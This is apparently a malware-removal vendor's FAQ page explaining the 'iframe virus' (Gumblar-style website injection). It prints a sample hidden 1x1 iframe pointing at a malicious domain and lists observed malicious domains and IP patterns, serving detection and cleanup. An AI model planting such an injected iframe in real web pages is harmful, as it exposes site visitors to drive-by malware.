buy malware removal aid kit
Reply to comment

Webmasters call it iframe virus? Why?

Badware like gumblar and other variants work by injecting malicious code into your website - be it HTML or PHP or ASP.
If you see the source of HTML, you will find some code like this:
 
 <iframe src="http: //coolnameshop .cn/ in.cgi?income23" width=1 height=1 style="visibility: hidden"></iframe>
 
There are typical hidden iframe tags injected at the bottom of webpages. The domain names may vary but they typically end with .cn, .ru, ro, etc. The domain names usually contain words shop, cool, lot, bet, etc.. Most of these domain names point to IP addresses like 94 .247 .3 .151, 94 .247 .3 .150, etc. The iframes load pages with paths similar to  “in.cgi?incomeNN”, where NN is some arbitrary number. In recent times, we have found iframe code with domain patterns like 3b4 .ru/, q3e .in/, x3y .ru/, using port 8080 .
 
Here is a list of domains used that we observed in the code:

  • coolnameshop .cn
  • chura.pl
  • jl.chura. pl
  • medical-static-center.ru
  • lotultimatebet .cn
  • lotmachinesguide .cn
  • cheapslotplay .cn
  • lotultimatebet .cn
  • cutlot .cn
  • mediahousenameshopfilm .cn
  • betbigwager .cn
  • namebuypicture .cn
  • thelotbet .cn 
  • hotslotpot .cn
  • mixante .cn
  • lotante .cn 
  • superbetfair .cn
  • litecartop .cn 
  • betworldwager .cn
  • litecarfinestsite .cn
  • homenameregistration .cn
  • litegreatestdirect .cn 
  • playbetwager .cn 
  • nameashop .cn 
  • mainnameshop .cn
  • superlitecarbest .cn
  • internetnamestore .cn
  • dotcomnameshop .cn 
  • mediahomenamemartvideo .cn

 

Browse all iframe virus FAQ

Reply

  • Web page addresses and e-mail addresses turn into links automatically.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd>
  • Lines and paragraphs break automatically.

More information about formatting options